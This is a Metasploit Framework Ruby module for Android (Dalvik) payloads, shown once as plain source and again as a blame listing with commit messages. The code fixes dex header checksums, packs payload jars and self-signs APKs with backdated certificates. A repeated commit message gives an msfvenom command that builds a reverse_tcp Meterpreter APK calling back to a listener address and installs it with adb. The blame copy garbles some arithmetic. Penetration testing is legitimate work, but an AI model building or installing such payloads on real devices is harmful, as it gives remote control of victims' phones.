metasploit-framework/lib/msf/core/payload/dalvik.rb

# -*- coding: binary -*-
require 'msf/core'

module Msf::Payload::Dalvik

  #
  # Fix the dex header checksum and signature
  # http://source.android.com/tech/dalvik/dex-format.html
  #
  def fix_dex_header(dexfile)
    dexfile = dexfile.unpack('a8LH40a*')
    dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])
    dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))
    dexfile.pack('a8LH40a*')
  end

  #
  # We could compile the .class files with dx here
  #
  def generate_stage
  end

  #
  # Used by stagers to construct the payload jar file as a String
  #
  def generate
    generate_jar.pack
  end

  def java_string(str)
    [str.length].pack("N") + str
  end

  def string_sub(data, placeholder="", input="")
    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
  end

  def generate_cert
    x509_name = OpenSSL::X509::Name.parse(
      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
      )
    key  = OpenSSL::PKey::RSA.new(1024)
    cert = OpenSSL::X509::Certificate.new
    cert.version = 2
    cert.serial = 1
    cert.subject = x509_name
    cert.issuer = x509_name
    cert.public_key = key.public_key

    # Some time within the last 3 years
    cert.not_before = Time.now - rand(3600*24*365*3)

    # From http://developer.android.com/tools/publishing/app-signing.html
    # """
    # A validity period of more than 25 years is recommended.
    #
    # If you plan to publish your application(s) on Google Play, note
    # that a validity period ending after 22 October 2033 is a
    # requirement. You can not upload an application if it is signed
    # with a key whose validity expires before that date.
    # """
    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
    return cert, key
  end
end
android meterpreter 2013-04-12 17:35:03 +00:00			`# -- coding: binary --`
			`require 'msf/core'`

			`module Msf::Payload::Dalvik`

Retab lib 2013-08-30 21:28:33 +00:00			`#`
			`# Fix the dex header checksum and signature`
			`# http://source.android.com/tech/dalvik/dex-format.html`
			`#`
			`def fix_dex_header(dexfile)`
			`dexfile = dexfile.unpack('a8LH40a*')`
			`dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])`
			`dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))`
			`dexfile.pack('a8LH40a*')`
			`end`
Add in-line signing Signing the generated APK in the module means users don't have to have keytool or jarsigner to create a working package. Example usage: ./msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk adb install ./meterp.apk 2013-04-25 18:57:54 +00:00
Retab lib 2013-08-30 21:28:33 +00:00			`#`
			`# We could compile the .class files with dx here`
			`#`
			`def generate_stage`
			`end`
android meterpreter 2013-04-12 17:35:03 +00:00
Retab lib 2013-08-30 21:28:33 +00:00			`#`
			`# Used by stagers to construct the payload jar file as a String`
			`#`
			`def generate`
			`generate_jar.pack`
			`end`
Add in-line signing Signing the generated APK in the module means users don't have to have keytool or jarsigner to create a working package. Example usage: ./msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk adb install ./meterp.apk 2013-04-25 18:57:54 +00:00
Retab lib 2013-08-30 21:28:33 +00:00			`def java_string(str)`
			`[str.length].pack("N") + str`
			`end`
Add in-line signing Signing the generated APK in the module means users don't have to have keytool or jarsigner to create a working package. Example usage: ./msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk adb install ./meterp.apk 2013-04-25 18:57:54 +00:00
moving string_sub() to payload/dalvik.rb 2014-03-03 04:54:56 +00:00			`def string_sub(data, placeholder="", input="")`
			`data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))`
			`end`

generate cert @ payload/dalvik.rb 2014-03-04 03:54:31 +00:00			`def generate_cert`
			`x509_name = OpenSSL::X509::Name.parse(`
			`"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"`
			`)`
			`key = OpenSSL::PKey::RSA.new(1024)`
			`cert = OpenSSL::X509::Certificate.new`
			`cert.version = 2`
			`cert.serial = 1`
			`cert.subject = x509_name`
			`cert.issuer = x509_name`
			`cert.public_key = key.public_key`

			`# Some time within the last 3 years`
			`cert.not_before = Time.now - rand(360024365*3)`

			`# From http://developer.android.com/tools/publishing/app-signing.html`
			`# """`
			`# A validity period of more than 25 years is recommended.`
			`#`
			`# If you plan to publish your application(s) on Google Play, note`
			`# that a validity period ending after 22 October 2033 is a`
			`# requirement. You can not upload an application if it is signed`
			`# with a key whose validity expires before that date.`
			`# """`
			`cert.not_after = cert.not_before + 360024365*20 # 20 years`
			`return cert, key`
			`end`
android meterpreter 2013-04-12 17:35:03 +00:00			`end`